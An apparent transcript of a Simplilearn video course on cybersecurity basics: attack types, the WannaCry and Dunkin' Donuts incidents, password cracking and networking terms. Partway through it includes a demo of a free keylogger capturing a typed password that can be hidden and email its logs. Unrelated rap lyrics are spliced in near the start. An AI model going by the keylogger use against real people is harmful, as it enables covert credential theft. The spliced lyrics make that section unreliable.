Hey everyone, this is Shruti from Simply Learn. Welcome to this video on Cybersecurity Full Course. In this full course, we will learn all about one of the most popular body of technologies today, that is cybersecurity. According to Forbes, the global cybersecurity market is currently worth $173 billion in 2020 and it is predicted to reach $270 billion by 2026. Isn't that a whopping number? That shows the prominence cybersecurity holds in today's world. So without further ado, let's get started with this full course video on cybersecurity. Here we will understand cybersecurity from scratch and also look into ethical hacking. We'll begin this full course video with different types of cyber attacks, the importance of cybersecurity and what cybersecurity is all about. After this, we will look into the concept of ethical hacking along with a hands-on demo for each type of cyber attack. Following this, you will be briefed about the various cybersecurity certifications available today and the career prospect in this field. We will also look at the roles and responsibilities of a certified ethical hacker and how you can become one. We will then conclude this video by briefing you all about the world-renowned CISSP certification. For this training, with me, I have our experienced cybersecurity specialist, Bipin, and together we will take you through the various topics in cybersecurity. All of this in under 9 hours. So let's start off with an interesting video on cybersecurity. But before we begin, make sure to subscribe to our YouTube channel and hit the bell icon to never miss an update from Simply Learn.
Meet Anne. She often shops from www.
I don't ever slow up, no I don't take shit. I got no love for the fakeness. If you wanna play tough and wanna hate this, I'll always show up. I don't ever slow up, no I don't take shit. I got no love for the fakeness. If you wanna play tough and wanna hate this, I'll always show up and make a statement. I don't ever slow up, no I don't take shit. I got no love for the fakeness. If you wanna play tough and wanna hate this, I'll always show up and make a statement.
Everything I do so instinctive and so passionate. Every word I move so descriptive like an adjective. I got a vendetta against people who patented being negative when you should be getting after it. I got facts over tracks, this and that, spitting slow, speaking fast. I can roast, I can gas, think I'm okay and last, but I don't know if that can erase all the past and the pettiness. A reflection of the emptiness, hilarious. You think you're worth my time, you're delirious, mysterious, because you are behind a fake exterior, inferior. You know I'll always be a bit superior. Get off of me, this ain't no humble brag. I want you to hear words, you can say them back. I want you to feel free from the chains at last, and to believe in what you got, it was built to last, yeah. Now that I've been through the hell, I never got anyone's help. I had to do it all myself.
I don't ever slow up, no I don't take shit. I got no love for the fakeness. If you wanna play tough and wanna hate this, I'll always show up and make a statement. I don't ever slow up, no I don't take shit. I got no love for the fakeness. If you wanna play tough and wanna hate this, I'll always show up and make a statement.
Gonna learn the consequence of being incompetent. Mental health is confidence, dreams and some modestness. I'm not here to save the day, that's for you to take away. I could play a million mind games, but instead of say something not illogical, something that is topical. Rub it on and watch it go, make yourself unstoppable. Dreams are irresponsible, but they're always possible. If you just believe, you could be so remarkable.
Thoughts in my head, a collage and they spread. I'll be great one day, going off of my meds. No, I'm not giving up, no, I'm not giving in. I will make it to the top, taking off in the wind. I gotta make it, I'm saving every day to taste it. I'm patient, but my mind, it can hardly take it. I'm chasing a dream that I've had for several ages. A vacant, modern kingdom for the taking.
Now that I've been through the hell, I never got anyone's help. I had to do it all myself.
I don't ever slow up, no I don't take shit. I got no love for the fakeness. If you wanna play tough and wanna hate this, I'll always show up and make a statement. I don't ever slow up, no I don't take shit. I got no love
DDoS attack, when multiple systems are used to launch the attack. When a in the production of global digital data, it is anticipated that cyber attacks will quadruple in the near future. Organizations are going to need cybersecurity professionals who can prevent these attacks. A career in the field of cybersecurity is lucrative and a very smart decision for professionals now. So, what are you waiting for? Get certified with Simplilearn and become a cybersecurity expert.
Let's begin with the rise in cybercrimes. So, let's talk about WannaCry. This is something that happened way back in 2017. Let's not say way back, it's just 2019, 2 years back, and it took the world by storm. So it was a cyber attack which encrypted the data of organizations, and then the hackers held that organization ransom by asking, or rather demanding, money from them to decrypt their own data. So what exactly happened? The attack originated in Asia and then spread across the rest of the world. Note the date. And how did this happen? There was a vulnerability that was identified in Microsoft Windows, the SMB vulnerability. SMB, which is server message block, is essentially the file sharing and the printer sharing services that you use in a LAN environment on Windows operating system. By default, these are enabled on your desktops, and there is a hardening guide that people utilize to either upgrade the version of SMB to a more secure version or to disable SMB and utilize something else. Now, this was a known vulnerability, and this was targeted. Within days. More than 230,000 computers were infected across 150 countries. Now, when we say this was identified, Microsoft knew of this vulnerability, and in fact, they had released a patch in April of 2017 to mitigate this vulnerability. Within 2 months of that release, this attack had happened. Now, in a real world scenario, it is not possible for all the servers and devices to be upgraded to the latest patch level, because organizations need to test those patches to see if those patches are going to interfere with the services that they are providing. And hence, no organization will be completely patched up at any point in time. And this was the flaw that sadly took down a lot of organizations. The patch was available, but it was under testing. Some were not utilizing it yet, and they did not see it as a high value risk. And suddenly something happened and WannaCry took place. Now, what happened was a crypto worm called WannaCry, which basically encrypts the data and locks the user out of their own computers. And they get a screen in front of them which says your data has been encrypted, and it gives them a link, and they demand $300 to $600 to be paid to the hackers to retrieve the decryption key for their data. Now here, obviously you're not going to pay cash to hackers, neither are you going to make a bank transfer, because both of the ways you can identify the hackers and then pursue them. So the hackers demanded this exchange via bitcoins, cryptocurrency. This is the best way to remain anonymous and the best way to make payments over the internet without being identified. So what was the impact of the attack? Around 200,000 to 300,000 computers were infected. Now it sounds like a small number of computers when we're talking about global. However, the services that it affected were huge. In UK, the National Health Service got affected. All the databases got encrypted. Surgeries and treatments of patients were postponed. FedEx, Renault, Nissan, all of these organizations got compromised, and their production lines basically shut down for a few days till they retrieved data from backup, started to restore, and then tried to bring back everything to normal. Then, in February 2019, Dunkin' Donuts announced that the users of their reward programs were targeted by a credential surfing attack. That means that the attackers stole the credentials, usernames, and passwords of customers of Dunkin' Donuts. Now we think Dunkin' Donuts, they sell donuts, how much could it impact anyone? But if you have an online account with Dunkin' Donuts, you also have your personal identifiable information stored in those accounts. For example, your name, address, credit card information, maybe your social security number or your national insurance card or something like that, which can lead to identity theft. People can misuse that information, pretend to be you, and then take out loans or do transactions in your name where you are going to end up paying those bills. So stealing of such kind of data is going to impact all the users adversely. So the first name, last name, and email IDs were stolen. That is still good enough to launch social engineering attacks and target these victims to phishing attacks or similar attacks. So now let's look at the different types of attacks in cyber. So we are going to discuss these 6 malwares. We are going to talk about social engineering attacks, man-in-the-middle attacks, denial of service, SQL injections, and password attacks. Now if you look at this, malwares basically target hosts, operating systems. Social engineering attacks would address or attack the gullibility of a human being with the help of a computer. For example, sending a fake mail or hosting a fake website. Man-in-the-middle attack would target a network and then try to capture data packets within the network, thus compromising your credentials. A denial of service attack would crash a service. SQL injection attacks would attack an application, and a password attack would attack the usernames and passwords of accounts, thus taking advantage of weak passwords and getting access to your accounts. So let's start with malwares. Malware basically refers to malicious software. The first part of malicious, mal, and the ware out of software becomes malware. Malwares are nothing but vehicles in which hackers embed payloads. Payloads could be viruses, worms, ransomwares, trojans. So they hide these kind of malicious softwares within legitimate looking softwares and they post them on the internet. People who are interested in those kind of softwares will obviously download them, and since they are looking very legitimate, they will try to install them, thus accidentally and unknowingly installing a Trojan, virus, or a ransomware on their machine. Now, most of us have done this at one point in time where we have looked at pirated software because we did not want to pay for it, and then we probably go to torrents and then search for those softwares, download them, and there is a keygen.exe over there which we have to execute, and then we have to copy that code, the exe file that comes out of the keygen, and then we have to replace it. And I mean, it's a very convoluted process, but the fact that you have to restore some code with some other code would basically mean that there is something wrong with that file. So 99% of the time, these programs would have viruses or trojans embedded within them, and it is going to affect the security posture of your computers. If you scan keygen.exes with any antivirus across the globe, they will always report them as malwares, and they will probably want to delete those kind of files. So how do these get infected? It gets infected into a system when the user clicks on a suspicious link. Now, obviously, if you think it is a suspicious link, you're not going to click on it. But you trust the link or you're compelled to click on it just out of curiosity. Let's say you click on that link, there's a redirector, it downloads an attachment from a malicious server and it gets installed on your machine. Most of the common ways a virus or a worm is spread is through USB devices. People pass around USB devices like nobody's business, and you have no idea where that device has been used before, and you plug into your machine, and if there is a virus on that USB device, it will get infected on your machine as well. Malwares are nothing but malicious softwares that pose as legitimate softwares but will have a virus, trojan, or a worm embedded within it, right? It could also be a keylogger. A keylogger is nothing but another software that is created to catch all the keystrokes that the user is making, create a copy of it and store it and send it back to the hacker. So whatever the user is typing, it will now be known to the hacker. It could be bank details, passwords, any personal information that the user might want to keep secret. We are going to look at 3 different demos here. This demo is just to showcase a couple of things. We are going to look at a keylogger, how a keylogger works, this virtual machine here, and I've already downloaded a keylogger and installed it. The idea of this demo is to showcase how a keylogger functions, right? So you can see online on the screen, we are using a free keylogger.en.softonic.com. We are on this site and you can download the free keylogger right from here. What I've done using my demos is that I've always have a keylogger running in the background to capture all the keystrokes that I've been doing whenever I'm doing any demos. So this keylogger here can actually be hidden in the taskbar, but for our demo purposes have kept it visible. When you click on it, it will open up and give you a basic screen where you can start navigating about the keylogger. Now you can see that on 8th, which is today, it already shows some keystrokes, applications, and some visited websites. As you can see, already been browsing using the browser over here, and which has been recorded by the keylogger in the background. And just to give you an example, if I click on this file, you will see all the keystrokes that I have been doing so far. And you can see I've gone to this, I've opened up my Mozilla Firefox, I've typed in a search keyword of free keylogger. Then I've gone on to the website howsecureismypassword.net, in which I may have tried out a few passwords myself. And then I've gone and copy pasted this URL into the browser window, and you can see all of this has been recorded. And just to emphasize on that, let's go on to another website, and let's go to facebook.com. I'm not actually going to log in. I'm just going to type in a random username, so someone at simplylearn.com, and a password like asd@1234, and I'm going to try to log in. Obviously the login is going to fail because this account doesn't exist, but we want to see what happens in the background when the keylogger picks up the keystrokes that we have typed. So let's open up the keylogger again and go and see what is there in the keystrokes and clipboard. And you can see over here that we typed in facebook.com, enter, and then we did not type in the username. That's the difference here. We selected it from a drop down. So a keystroke logger or keylogger has not been able to capture that input. A keylogger in its essence is only records something that has been typed in by the user real time. Since we did not type in the username, it did not record that username, but we typed in the password, and you can see the password over here, asd@1234. And this is how a keylogger works. It only captures the keystrokes that have been typed in real time. So if we use this exercise on our victims and they're just using drop-down menus, at that point in time, none of the data is going to be recorded. For that activity, you would need something which is known as spyware, which would capture screens, which would capture all of this information that is going on. Now, apart from just logging keystrokes, what this software also does is it also has a list of used applications. You can see all the applications that have booted up along with the operating system and the ones that have started up after the operating system has booted. It also has a list of the visited websites. So you can see these are the websites that we have been visiting, and they have been listed right here. The last one being Facebook, login or sign up, right? So this can store history for a really long time. If I go back in time and if I look at some of the demos that I've been looking at, so on 14th of September, these were the keystrokes that I utilized when I was doing some trainings or while I was providing some demos on other topics. So a keystroke or a keylogger will store all that information and keep on recording it till you actually delete that data, or you can reset the keylogger. You can also set up the keylogger to send an email to you on a daily report to a particular email address that you have sent. So as long as it detects the internet connectivity, this keylogger will send you an email to the email address that you have specified with all the keystrokes that it has logged. Now this is the free version. There's again a paid version for it, so you can go and visit this site and see how this keylogger functions. If I press on the X button over here, it will ask me if I want this to be hidden in the system tray. If I click on yes, it only using this shortcut will I be able to invoke this screen. So just for demo purposes, I do not want this to be hidden. So I'm going to click on no, and you can see that the keylogger is still visible over here. So that was the first demo that we are seeing. Viruses, as we all know, are destructive programs that once executed would destroy data or harm the hard disk or the partition tables. Worms, on the other hand, would be softwares that would be more of a nuisance value, where they're going to replicate themselves in such a way that they would consume the resources of a computer, thus crashing the computer and then requiring a reboot. A Trojan horse is another software that will allow a backdoor entry or a covert channel to the hacker, where the hacker in this case would then be able to gain access to the victim's machine through the covert channel or the backdoor without the knowledge and the authorization of the user themselves. Let's talk about social engineering attack. Now this is where your people skills come into the picture. This is the art of manipulating people and convincing them to give up confidential information, either knowingly or unknowingly. So most likely, we trust our friends, right? And we talk to them a lot. and we give out some confidential information which we would not give out to others. What if somebody is pretending to be our friend just to get this information out of us, and we trust this person, we give out that information, and we suddenly get affected because of that? Now, I'm not saying that everybody in the world does that, but it is one of the most common attacks that is experienced in the computing world. Now, social engineering attacks can be broken down into three categories. First is a phishing attack. Don't worry about that figure over there. You're actually not going to go phishing. It's basically what known as a phishing attack. Then there is a spear phishing attack, and then there's a veiling attack. All of these are types of social engineering attacks where you're targeting a user by sending out fake mails or fake websites, and their gullibility into clicking on those links and then giving out information. So what is a phishing attack? It is a practice wherein a hacker usually sends fake mails which look really genuine, or hosts fake websites which also look genuine and looks like they're from a trusted source. Once you click on those links, there would be embedded scripts or embedded malwares which would then be executed and then get installed on your machines, compromising the security of your device. These utilities could be used to steal credit card information, steal data from your computer, upload data to your computer, use your computer as a bot, and anything and everything that the hacker might want to do. Spear phishing is a variation of phishing. Now, phishing is a non-targeted attack. It is to the whole world at large. Whoever becomes a victim becomes a victim. However, spear phishing is a targeted attack. It is to a specific individual or to a group of individuals in an organization. So, it becomes a customized attack. You identify the victim, you identify the flaws that are existing over there in the organization, you identify the gullibility of the victim, create that fake mail to suit that particular situation, send it across to them. They'll click on that link and get infected by whatever payloads that you have embedded within it. Veiling is when you are targeting particularly wealthy or powerful people in the industry. So normally when you're targeting CEOs, CFOs, high-level management people of an organization, it would be known as a veiling attack. So here the example is where the email has been received. Dear customer, your account is going to expire today. To keep your account activated, please click on the link here and proceed with the verification process. Now here the link that we see, activate.com, would be a hyperlink which is going to mask the actual URL where the link is going to redirect us. Right here, the attack is on the gullibility of the customer, where they would fear that the account would be deactivated, and to prevent that, they would trust this email, click on the link, and then provide the information, thinking that they're just reactivating their account, but they're actually leaking their own information to the attacker. So the first thing you have to understand is banks or any organization are not going to send you any emails with a link in it asking you to reactivate or anything like that. In fact, banks proactively tell us that they're not going to call us and ask for any information. In fact, they would want us to call them on their registered number or the helpline number that they have declared on their website or on the cards that we possess. This is something very common in today's world. This is basically where the prey is the human itself. And the reason social engineering attacks are very successful is because of the gullibility factor that a human has. For example, human has something called emotions that a machine wouldn't. You could plead with a human for a password to be reset by gaining sympathy or empathy. But try doing that with a machine, those attacks are going to fail. Social engineering attacks are not only limited to those, but we can talk about phishing. Phishing is also a part of social engineering attack, where the gullibility of the user to click on that link is being exploited. In this scenario here, this is Clark. He is calling from the ID security team. That means that he is impersonating probably, and then telling the victim that the system has been compromised. Please share the password with me. The victim, on the other hand, thinks that the person is trying to help her. She probably doesn't verify that person, trust that person, and then provides the password over the phone. Now here, it is fear that is being exploited, because the password being compromised would clearly upset the end user for loss of data or for the computer revealing out confidential information. Thus, here she is trusting the IT security team for the password to be reset and given back to her. Then we come to the network attacks, man in the middle. This is also known as an eavesdropping attack, which literally means that you are going to listen in on to somebody's conversation. For example, in the figure, the client is trying to talk to the server, but you become a man in the middle and you try to listen in on the conversation that is going on. Now, obviously, the conversation over here may not be audio, but be data, that is being exchanged between the server and the client. You just listen in, you make a copy of that data and you store it at your end. The data could contain usernames, passwords, may contain confidential information and help you compromise data. The attacking computer takes the IP address of the client. So you find out the IP address of the client. The client is not aware about this. The client is trying to communicate with the server. You spoof yourself as a default gateway or a trusted device, and the client thinks that it is through you that they need to communicate to the server, and thus they start sending data via your PC. So this attack normally happens on public Wi-Fi networks. I've seen that happening a lot, and thus I never recommend anyone using those public Wi-Fis. For example, you go to a coffee shop, they have free Wi-Fi over there, you connect to it and you start surfing, you start browsing. You are always signed into Google, Facebook accounts, your bank accounts and whatnot. And then there's a sniffer, there is a hacker who's doing a man-in-the-middle attack, capturing all that data. Now, it's not an easy attack, but it can be done. So this diagram shows where the man-in-the-middle attack has become successful, and now that the client and the server both are sending information via the attacker without knowing that the attacker is capturing all that data. So here in this example, here suppose you're in trouble and you need money right now, and you call your friend and ask for money. So here the person is calling John, telling John that they're in trouble, and they're asking for John to give their credit card number over the phone. Now this is a legitimate transaction. The friend is actually calling John and asking for some help. However, when John is providing that help over the phone with the credit card numbers, maybe the CVV number and all of that, and then the OTP at the end of it, at the same time there could be a hacker doing a man-in-the-middle attack where they could be eavesdropping on whatever is being said or whatever data is being transferred. And once they capture this confidential data, they can then misuse that data to their own gains. Then comes the denial of service attack. The motive in a DOS attack is not to benefit monetarily, but to bring down a service for legitimate users, thus just causing harm to the organization. For example, if I consume the bandwidth of to a particular website, since there's no more bandwidth left, other legitimate users who want to interact with the website will not be able to connect to the website, thus creating a denial of service to those legitimate users. Now, it may not be possible for me to use my laptop to target a cluster of servers because obviously the bandwidth at the other end would be very high. So I would distribute my attack across multiple devices, thus creating a distributed denial of service, also called a DDoS attack. Then we come to the SQL injection, or SQL. SQL stands for Structured Query Language, which is the de facto language that is used by applications to interact with databases. So let it be a Microsoft SQL database, MySQL database, Oracle SQL. The syntax may be a little bit different, but it is still the structured query language that applications utilize to interact with the database. Now, the queries that are created by the applications need to be sanitized at the application level itself. So developers need to be very careful of how they are going to create those queries, what queries are allowed to go to the database, because a database is designed to answer queries. It doesn't know what is a legitimate query and what is a illegitimate query. If it receives a query, it is going to try to execute it and give out information. Thus, a hacker may insert malicious queries or malformed queries into a SQL server through the vulnerable application, causing a security event. So, depending on the queries that have been created, the attacker could delete some data or modify data, add data, edit it, or do anything that is malicious in nature that would compromise the integrity and the security of that database. For example, the Dunkin' Donuts, right? Except apart from being a credential attack, since they got access to the database, they could have added or deleted any information about any users that were there. As the name suggests, this attack is used to crack or get the password for user's account. When we say crack passwords, this is basically where somebody is trying to brute force or they're trying to guess the password and they're going to break the password, thus getting access to your accounts. There are 5 different ways passwords can be cracked. The first one is a dictionary attack, where we use every password that is possible through the dictionary. Now this is the use of an actual dictionary, and that's one of the reasons when we try to create passwords, we are advised not to create passwords based on dictionary words, because these are easily guessable and there are lists already out there that contain all of these words. There's a tool that you can utilize, and that tool will then parse through each and every word that is in the dictionary file and then compare it to a possible password. If one of the words matches, the password has then been compromised. So if you are observing a little bit higher security where we have created a password that is not based on a dictionary word, then we want to look at other attacks like brute force. It is a trial and error method. So basically what we do is we identify how the passwords were created. For example, in today's world, the policies would be to consume in a password any of the alphabet characters A through Z, uppercase or lowercase, 0 through 9, and then special characters. And then we want to randomize the usage of these characters so that they are not easily guessable. But a brute force attack at the same time would then try every permutation and combination there is possible in the entire character set and then try to figure out the password. Now this takes a really long time and does take a lot of compute and storage power, and that's where the botnet example comes back in, the one that we saw earlier, which was used for DOS attack. But similarly, if I've infected multiple computers like this, I can then distribute this attack onto all those computers and use the entire compute power that is available to shorten the time that is required to crack the password. Now, this is 100% successful given the time that it may take. So if the time that is going to take is going to be 100 years, the attack becomes unsuccessful because during that period, the password is most likely to be changed, the technology is going to be changed, and so on and so forth. So if the password is easily guessable, this can be a very easy attack to perform. Then a keylogger, which is a similar attack to what we have seen. So a keylogger, as discussed earlier, is nothing but a software that once installed on your machine would grab each and every keystroke that the user has made and store it in a file which the hacker can later on access. So whatever you have been typing, passwords, credit card information, or anything else, all of those would be recorded and stored in a file, and that's one of the best way a password can be compromised. Then shoulder surfing. This is a physical attack rather than being a technical one. Here you need to physically be present when the user is typing in their password, and you actually look over their shoulder to see what they're typing and try to figure out what the password is. If they're quick typers, it is going to be a little bit more difficult. If they're slow typers, it's going to be that much more easy. And the last one is called a rainbow table. Now, passwords, when applications store them, are stored in hash format. Hash is nothing but a one-way signature that is created of the password file, of the word that is used for the password, and it is based on an algorithm. So the input could be of variable length. For example, a password could be 7 to 14 characters, but the output of a hash value would be fixed based on the algorithm that you're consuming. So most common algorithms in today's world that we utilize are SHA, secure hashing algorithms. Before that, we used MD5 or message digest. So all of these convert the passwords from plain text into a hash value and store it into a database. So if you actually attack that database to grab a password, you're going to get the hash value, not the password in clear text. And thus, in that scenario, comes the rainbow table to the rescue. A rainbow table is nothing but a file that will have the list of all possible passwords along with their hash values in the required format. So if you remember the dictionary attack was nothing but a list of words based on the dictionary that were stored in a file, and then the software was just trying each and every word against a possible password. Here, we do not have the word, but we have the hash value. So to reverse engineer a hash value, what we created is, we created a rainbow table where there would be a list of all the possible passwords and their corresponding hash values. So we then compare the hash value that we have captured and then search for that hash value in the file that we have created. The hash value that matches the corresponding word to it is the password in clear text. So these are the 5 types of password attacks. Now let's talk about the types of network attacks. An active attack is an attack when the intruder attempts to disrupt the network's normalcy and modifies the data and alters the data at the same time. So as you can see in the diagram, there's a sender and there is a receiver. The attacker is the man in the middle who is now trying to create the active attack. So when the sender sends that data to the receiver, the attacker intercepts that data, modifies the data, and then sends the modified data to the receiver. Since the attacker is a man in the middle, as we have seen in the previous attacks, the receiver, neither the sender would be aware of the attacker, and thus they would not be aware of the modification that has been done. In a passive attack, the intruder just eavesdrop on the data. They just listen in onto the conversation, but they do not modify the data at any time. So they just capture the packets, they copy the contents so that they can use that at a later stage. Now let's go a little bit further and see what would motivate people for committing such cybercrimes. Right? The first and foremost motive is disrupting business continuity. Others would be looking at data theft or information theft and manipulating that data to gain from that data. So if I'm able to access your computer and steal some data that has some value to you and sell it or make it public, you would be at a financial loss because that data no longer has any value. Creating fear and chaos by disrupting critical infrastructure. For example, a company's infrastructure crashes, the services are no longer being offered by that organization, and people start panicking, start fearing an attack by cyber criminals, and it leads to chaos. Financial loss to the target, which is very obvious. If I do a denial of service attack, or if I make a service unavailable from an organization, what is going to happen is, since that service is not functioning, the company is not going to make any money out of it, and thus going to suffer a financial loss. Achieving states' military objectives, one country spying on another country, trying to gather information about their military intelligence, military activities, or any other activities that can harm the original country. Demanding ransom, hackers can encrypt your data and then demand a ransom from you in lieu of decrypting the data again. Damaging reputation of a target, impersonating a user on the social media platforms, making false statements, thus damaging the reputation of that person, and propagating religious or political beliefs. Religious fanatics, promoting whatever cultures that they want to promote, trying to gain more followers, thus bringing more unrest to the world. Any of these could become motives for cybercrime. Let's look at the history of cybercrime. So as you can see, this graph shows us how cybercrime has progressed over the years. In 1990s, MNC database, Pentagon and IBM were hacked. Again in 1990s, national crackdown on criminals, Microsoft NT operating system pierced. So this is where hacking started becoming more mainstream. Right? Before this, hacking was very much limited to organizations who used computers. But in the late 80s, internet happened, and then we had e-commerce coming in, which basically led to our online retail stores, online banking, and online data stores as well, which then led to criminals hijacking this data or hijacking your money and trying to steal it on the internet itself. In 2001, cybercriminals launched attacks against eBay, Yahoo, CNN, Amazon, and other organizations. 2007, this was where one of the biggest bank hacks had happened. Swedish bank Nordea, they recorded at least $1 million being stolen in 3 months from 250 accounts. 2013, Adobe had 2.9 million accounts compromised and their usernames and passwords released on the open internet. In 2016, Kaspersky, one of the leading antivirus providers to the world, reported around 758 million malicious attacks that occurred, which they identified themselves. These are some of the most famous faces in cybersecurity or earlier cybercrime. In 1988, Robert Morris, he's an American computer scientist and entrepreneur. He's best known for creating what is called the Morris worm, and this was way back in 1988, and this is the first computer worm that has been identified on the internet. Kevin Lee or Kevin Lee Polson, in 1990, he was accused of hacking into a Los Angeles radio station called KIIS-FM, where there was a contest going on, and if you're a particular number of caller and give a correct answer, you're supposed to win a Porsche 944. And he hacked those telephone lines, ensuring that he became that particular person and answered the question correctly. It was later on revealed that this actually happened. He was jailed for it. Then comes David Smith. David Smith, he created the Melissa virus. Now, Melissa virus, one of the most dynamic viruses known, around March 1999. That's when this happened. This virus was released, and this was a macro-based virus which affected Microsoft Word and Outlook-based files. Adam Botbill, in 2004, he's also an American computer hacker from Michigan. He gained unauthorized access to Love's corporate computer network via an open, unsecured, wireless access points. Now, these access points back then were not that much secured. These people were able to identify it. What they tried to attempt by doing that was gain access to the company's network and install a software which would then help them capture credit card information of that organization. Right? And this was later on identified as well, and he was prosecuted for that crime and got jailed. Just a matter of trivia, Kevin Lee Polson, He was one of the first people found guilty and was banned from using computers and the internet for 3 years after his release. In today's world, we cannot even imagine living without the internet. This guy lived for 3 years without it. So, this is why we want cybersecurity. Cybersecurity should be in place to prevent these kind of attacks. So, what exactly is cybersecurity? It refers to the practice of protecting networks, programs, computer systems, and their components from unauthorized digital access and attacks. So whatever your digital footprint, could it be servers, computers, switches, routers, web servers, web applications that you're hosting over there, services that you're consuming from the cloud or providing to other customers, you need to secure all of these to ensure that the integrity and the confidentiality of these services is intact and none of these services are affected by any cyber attacks which could lead to disastrous results. So the main difference we want to understand here is the difference between cybersecurity and information security. Information security is data within the organization where they handle sensitive information or proprietary information, copyrighted or patented information, and they want to secure it from data leaks or having that data in somebody's computer's hands. Cybersecurity is basically a technique used to protect the integrity of networks. So this is when you're going to go on the web and on the internet, you're going to secure your devices that you have deployed, allowing people to access your infrastructure from the outside. So what could be the cost of not being cyber secure? If you get hacked, or if your data is compromised, or if your information is compromised, you could have a lot of repercussions. Your goodwill will go for a toss. You may be open for lawsuits, not only from clients, but from customers as well. You could be open for fines or penalties from government organizations for failing to follow the law of the land. Customer trust will obviously be hampered. If you have been hacked and your data has been compromised, you wouldn't want to deal with that organization in the future. All of this could land the organization in a financial crisis where all the lawsuits and penalties that are being imposed could basically bankrupt that organization and thus take it out of circulation. So now let's look at some basic terminologies which we need to understand to go further in the cybersecurity world. First and foremost, network. What is a network? Network is nothing but a group of interconnected devices. Could be servers, could be workstations, could be laptops, could be any devices, file printers and whatnot to be interconnected with each other. As you can see in the diagram, it is used for communications. It's primarily used for data transmissions and to communicate between various terminals so that the business can go on. It is also used to share data and information. It could be wired or wireless. So you got a wired LAN, or at home we all have wireless networks where we connect all our devices. We use them for streaming videos. We use them to connect to the internet, surf websites, work from home. So we've got office also set up on our Wi-Fi. So a network is nothing but a collection of interconnected devices that are allowed to communicate each other freely so that the business can be continued in a proper manner. Server. A server is nothing but a hardware device that is supposed to handle requests of data information, allow network services to function from other computers and devices. So this is where we build a client-server relationship, where on the server we've got the major software, we got the data that is stored over there, and clients that interact with the server to consume that data in a particular manner that would help them make sense and analyze that data and generate business out of them. Then the internet. Internet is nothing but the collection of multiple networks globally. So all the networks that we have across the globe, when they are interconnected with each other, that is what internet is. And if we just go back and we talk about servers, this is what allows the internet to be formed. So every organizations, when they publish their servers on the internet and they allow everyone to interconnect through those servers, that is where the internet comes in, being the servers being the backbone of the internet. Obviously, for the servers to communicate with each other, we will need switches, routers, and other devices for the data transmissions to happen. So these are the multiple networks, could be individual networks, interconnected together would form the internet across the globe. For the internet to work, there would be a set of protocols for transmissions to be allowed across the globe. Now, this is where TCP/IP, or the Transmission Control Protocol over Internet Protocol, comes into the picture. So if you remember, we use communication channels like TCP, or the Transmission Control Protocol, and UDP, User Datagram Protocol. When we connect to web servers, we talk about the HTTP protocol and HTTPS protocol if we want it secure. Then we'll talk about IMAP, POP3, and all of these protocols. Now, where do these protocols come from? It is nothing but a suite of the TCP/IP software which contains all of these protocols which allow computers to communicate with each other. If TCP/IP wouldn't have been there, our network would have collapsed. Now, when we have TCP/IP and we want to communicate across the globe, how would we identify devices on the internet or even on the intranet? Because the devices don't know us, they are not going to use our usernames and passwords to communicate with each other. But when I want to connect to a website or a device, how do I identify it on the intranet or the internet? I obviously use IP addresses. Now, IP addresses are nothing but the internet protocol addresses, which are 32-bit addresses, which look exactly like the one shown on your screen, 172.16.254.1. Now, there is a lot of classification of IP addresses, and some of these IP addresses work on the internet. Some of them are supposed to work on private LANs, but we'll reserve that for a later topic. Then, the second way that we are identified on the internet or the intranet are with MAC addresses. So, media access controls or MAC addresses are hard-coded addresses that are given to our network interface cards. These cannot be modified physically at any point in time. However, there are techniques to spoof MAC addresses, which we can then obfuscate our existing address and give us a new one. That would again be discussed in a later lecture. A router. We've been talking about routers and switches. A router is nothing but a device that passes packets back and forth across networks. It routes the data in the appropriate path. So it is an intelligent device. It can understand IP addresses and MAC addresses. It can identify different paths of reaching a particular network. For example, if I'm sitting in India and I want to communicate across the world to America, there would be a specific path that needs to be followed for my data packet to reach the other side of the world. It is the routers that would map this path, store it in their cache. So when I try to connect to that server, they would retrieve it from the cache and send the packet across the globe. So the home router, as we use at home on Wi-Fi, is our default gateway to connect to the internet, and thus it allows our internal devices to communicate with each other using internal IP addresses. And when we want to go to the internet, it will then route the traffic on the internet and send the packet to other servers that we want to communicate with. Now, what is a domain? A domain is referred to as a group of computers and other devices that are interconnected and treated as a whole. Now, a domain is used by an organization. So let's say if I am XYZ, XYZ being the name of the organization, and I want to create a domain which would allow me to create a group of interconnected computers for my employees to interconnect with each other and send and manage data. I'm going to create a domain for my organization and attach all the devices, create users and interconnect them using a domain. So this is where you're going to have a centralized approach of a server-client relationship, where you're going to have a main domain and you're going to have devices connected to the domain. Now, when we go onto the internet, the domain name is nothing but the base part of a website name. So when you say google.com and you type it in your browser, you're taken to the web page called google.com, which is the search engine that you're connected. But for Google, the organization, at the other end, they would have a data center over there which would have all that relevant data which allows you to search through that information. So for them, the domain would be the internal part where they have got this cluster of servers creating a data center where all that information is stored. But for us as consumers, a website called google.com would be a domain for us to visit that particular website and consume the services that they're offering on the internet. So here the example is HTTPS, which means that it is a secure website, port 443, and we're connecting to cybersecurity.com. Cybersecurity.com becomes the domain name. HTTPS becomes the protocol that we want to utilize to connect to that particular website. Then we come across DNS, or the domain name system. It is nothing but an index, something like a phone book, which is responsible for mapping the domain name into its corresponding IP address. Now remember, I said that there are only two ways we are identified on the internet or the intranet, either the IP address or the MAC address. If it is devices, if it is computers who are talking to each other, it would obviously be IP addresses. But if I type in google.com, I'm giving it a domain name. The internet does not understand domain names. So there is a DNS, a server, which is an index or works like an index or more like a phone book, which will have a list of all the domains with their corresponding IP addresses. So whenever I type in google.com, the request goes to a DNS server. The DNS server is queried. The IP address of google.com is identified, pasted onto the packet, and then the packet is routed through the router to the path that it has determined to reach the google.com server. Here, replace google.com with cybersecurity.com. So, as you can see on the screen, the local PC queries the DNS server. The DNS server replies back with the IP address. Now, if you're wondering how does this work, if we're going to take an example of home networks, the ISP or the internet service provider gives us a default gateway or a router with their own IP addresses for DNS servers and default gateways. So when we try to connect through the router has the IP address of the DNS server and it routes that query to the DNS server. The DNS server replies back with the appropriate IP address. The router then takes that IP address, figures out the path and sends it across to the targeted server. DHCP or the Dynamic Host Configuration Protocol. It is a protocol that dynamically assigns IP addresses to the devices in the network. So we have discussed that IP addresses are required by computers to communicate within each other. But who associates or who gives these IP addresses to these computers? So for that to happen, we have got a DHCP server that is created. If you take your home networks, it is the router that has the DHCP role installed on it. So whenever a machine boots up, it sends out a broadcast request looking for the DHCP server, and then there's a communication with the DHCP server. The DHCP server then allocates an IP address to the computer who is requesting it, and once the IP address is allocated, an entry is made in the DHCP server's cache with the corresponding MAC address of that particular machine. Then we come to the next topic called VPN or a virtual private network. It is a connection between a VPN server and a VPN client. It's basically an encrypted channel that you're creating between two endpoints. And the main reason for a VPN is to encrypt 